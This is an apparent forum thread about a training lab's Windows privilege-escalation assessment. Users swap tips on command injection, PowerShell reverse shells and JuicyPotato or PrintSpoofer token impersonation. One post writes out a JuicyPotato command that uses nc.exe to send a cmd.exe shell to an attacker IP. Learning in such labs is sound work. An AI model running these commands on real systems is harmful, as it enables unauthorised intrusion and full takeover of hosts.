[ACADEMY] Windows Privilege Escalation Skills Assessment - Part I

You could get a reverse shell easily.
Check whether you are able to execute multiple commands in the browser (Hint: &&)
There are many ways to obtain a reverse shell but this was easy for me. Use power shell one liners. (There is a tricky part in it, if you know you know or else just dm me I will let you know)

Go to https://revshells.com/ and try different powershell payloads.

2 Likes

For anyone looking for the ldapadmin at the end something saved me A LOT of searching and heartache… a nice big plate of Italian food, always helps.

2 Likes

Someone can help me with the Revshell? I kow how you can enter command behimd the ip, but i cant get an revshell to my attacker host. Please send me an DM

I like this. You mean spaghetti and meatballs of course(?)

solved!

Can omeone help ,e with Escalation? i try JuicyPotato and it works but i have still the IIS User. How i get a shell or the User ?

Solved!

Hi folks. I have rev shell as iis user. I know the user has the impersonate privilege so we can use PrintSpoofer or JuicyPotato to exploit it. I managed to get both onto the target but none of them work. I tried cmd spawns, reverse shell using both tools but they just do not work. Can anyone please let me know what they used exactly? Do I need to somehow compile these tools specifically for the target? Both of these tools are described to work for W Server 2016.

The JuicyPotato exploit command works as provided in the material with one twist with en error popping out for which you can find guidance here. Mind any additional tools needed along e.g. nc.exe. The Printspoofer exploit did not work for me, but it might be incompatible with the specific windows version. Anyway, I didn’t find a solid reason why, so it might just be me.

Hi,
I believe i am stuck on the same problem you had. Here is my command that I have run and tried different CLSID for it too but nothing seems to work. I tried CLSID for Windows Server 2016 :

PS C:\Users\Public>

Did anyone figure out how to find the password for the ldapadmin before escalating privileges to system? I would guess there is a way because of the order of the questions.

Could anyone give me a hint for the rev-shell?
I have found the injection vuln and I am able to run cmd/PS commands through the vuln. I have tried the PowerShell one liners from revshell.com and also tried uploading nc.exe to try and use it to send shell but nothing seems to work?

@Sudo1 ? :slight_smile:

EDIT: Solved. Downloaded a new VPN…

Jumping on this thread after trying Juicy Potato multiple times…

I’m having trouble catching the elevated shell after JuicyPotato returns a successful elevation process. I’ve tried multiple ways like have cmd.exe pass another powershell reverse shell argument, and I’ve also tried placing both nc.exe and nc64.exe on the box too. I’ve even written a .bat file to shorten the syntax in the one-liner. No issues with CLSIDs, I’ve found multiple that work thanks to the CLSID.ps1 I ran on the target.

When I try to outright use nc.exe or nc64.exe to check the shell as the current user, I get no output or error of any kind. Do I need to compile nc.exe from source on the target? That seems like a lot just to elevate privilege for this exercise, but I’m willing to try. Have not tried printspoofer yet, maybe that will be easier.

Thanks

Ok, after a reset and taking some time to think about it, I figured out it was ultimately a syntax error in the JuicyPotato arguments. Seems the -a flag needs a ‘/c’ before the actual full nc.exe path to get a successful shell back. I was using .\example.exe instead of the full paths to cmd and netcat. Also the ‘/c’ threw me.

At least I had the fundamentals right!

:relieved:

Yes, in general you can use JuicyPotato with Windows Server 2019 / Windows 10 build 1809 and with newer builds you can use PrintSpoofer or RoguePotato. Works pretty well

Hi, Please help me exploit the command injection bug to access the reverse shell

HI am still stuck with the priv escalation with Juicy potato task. I tried all the CLSID what I got from CLSID.PS1 and the others in the same post but none of them helped me in removing the 10038 error. Can someone help me please how to fix this issue ?

c:\tmp\JuicyPotato1.exe -l 1337 -c “F87B28F1-DA9A-4F35-8EC0-800EFCF26B83” -p c:\windows\system32\cmd.exe -a “/c c:\tmp\nc.exe -e cmd.exe 10.10.15.35 8443” -t *Testing 98068995-54d2-4136-9bc9-6dbcb0a4683f 1337
COM → recv failed with error: 10038
PS C:\tmp> Testing 0289a7c5-91bf-4547-81ae-fec91a89dec5 1337
COM → recv failed with error: 10038
Testing 9acf41ed-d457-4cc1-941b-ab02c26e4686 1337
COM → recv failed with error: 10038
Testing 6d8ff8e0-730d-11d4-bf42-00b0d0118b56 1337
COM → recv failed with error: 10038
Testing 924DC564-16A6-42EB-929A-9A61FA7DA06F 1337
COM → recv failed with error: 10038
Testing f65817c8-dd85-4136-89f0-b9d12939f2c4 1337
COM → recv failed with error: 10038
Testing BA441419-0B3F-4FB6-A903-D16CC14CCA44 1337

Yeah I had that quite a bit in my attempts. Googling around brought me back to this forum post here and explained that error. For me, I had to continue until I found a CLSID that worked, but you may want to try resetting the target VM to start a fresh attack. I think network issues on the target host can cause that error, or potentially too many successive attempts might also cause the socket to close as well.

For the ones looking for answers to the second question. Don’t WASTE your time locating the ldapadmin credentials. Do the PrivEsc first. TBH i don’t understand why this quesiton was put in second place to begin with.